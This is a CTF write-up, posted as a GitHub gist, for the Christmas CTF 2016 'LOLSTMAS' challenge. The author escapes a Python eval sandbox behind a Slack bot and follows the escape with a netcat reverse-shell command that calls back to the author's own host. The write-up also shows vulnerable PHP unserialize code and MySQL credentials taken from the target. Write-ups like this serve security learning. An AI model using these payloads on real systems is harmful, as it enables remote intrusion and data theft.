Skip to content

Instantly share code, notes, and snippets.

@Jinmo

Jinmo/README.md Secret

Last active December 25, 2016 06:56
Show Gist options
  • Save Jinmo/a64ece7254de05b265959a9e297d8208 to your computer and use it in GitHub Desktop.
Save Jinmo/a64ece7254de05b265959a9e297d8208 to your computer and use it in GitHub Desktop.
Download ZIP
Christmas CTF 2016 LOLSTMAS
Raw
README.md

Organizers manually invite competitors to hidebot.slack.com slack channel. They says I can use hidebot, hidebot2~7, on query. Usage on public channel is prohibited by organizers.

To check the functionalities of the bot, they says they can use @hidesbot help command.

idk:
@hidesbot3 help

hidesbot3:
[*] Command list
- notice num
- 99dan num
- lolstat nick
- lol_notice

Currently, lolstat/lol_notice is not available.
Please use the website(http://52.175.145.142/lol/)

The website didn't seem to have some visible vulnerabilities.

  1. notice command only accepts number between 0 ~ 12.
  2. lolstat does not work.
  3. lol_notice works same as notice command.
  4. 99dan command's result is interesting.
request:response
1:1*1=1~1*9*9
1a:error
(1):empty
(1+1):empty
(1+1a):error

I did doubt that it is processed by a language. First I assumed it as python.

__import__('os').system('ls'):no hack

?! no hack?

'\x39':empty
0x9:empty
int('9'):empty
int("9"):empty
int('9')z:error

I certainly thought that it was python.

open('/etc/passwd'):empty
open('./flag'):error

Aww.. no flag. And there are some filters.

sys:no hack
__import__:no hack

I tried a traditional sandbox escape payload for python on CTFs.

@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__
(empty)
@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache']
(empty)
...

@hidesbot3 99dan [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__.values()[12].popen('busybox nc <my ip> <my port> -e sh')

?! shell acheived! There are source code of the website, as backup zip archive. (b4ckup4u.zip) Database connection information is redacted.

config.php:

<?php
$hostname = "localhost";
$user = "########";
$password = "########";
$dbname = "########";

$q = mysql_connect($hostname, $user, $password) or die("db error");
mysql_select_db($dbname, $q) or die("db error2");
?>

There was unserialize vulnerabity, and there seems to be intended mysql query function.

read.php:

<?php
include "config.php";
include "uclass.php";
$article_no = mysql_real_escape_string($_POST['no']);
$id = mysql_real_escape_string($_POST['uid']);
$pw = mysql_real_escape_string($_POST['upw']);
if(isset($_COOKIE['u']) && isset($article_no)){
	$obj = unserialize(base64_decode($_COOKIE['u']));
	ob_start();
	echo $obj->r();
...

uclass.php:

<?php
include "config.php";
class Go
{
	private $t = "board";
	public function r()
	{
		$q = "SELECT * FROM {$this->t} WHERE 1";
		$r = mysql_query($q) or die(mysql_error());
		$row = mysql_fetch_row($r);
		$arr = json_encode(array('subject'=>$row[1], 'content'=>$row[3]));
		return $arr;
	}
	public function b()
	{
		$q = "SELECT * FROM {$this->t}";
		$r = mysql_query($q) or die(mysql_error());
		$row = mysql_fetch_row($r);
		
	}
}
?>

I could use the class for querying database, but I have shell, and there are mysql client binary. There were config.php on /var/www/html too.

So I executed these commands:

mysql -uhidebot -p'lolbot!@#' lol
SHOW TABLES;
(pressed Ctrl+D)
Tables_in_lol
santa
board
mysql -uhidebot -p'lolbot!@#' lol
SELECT * FROM santa;
(pressed Ctrl+D)
<flag>

I forgot the flag.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment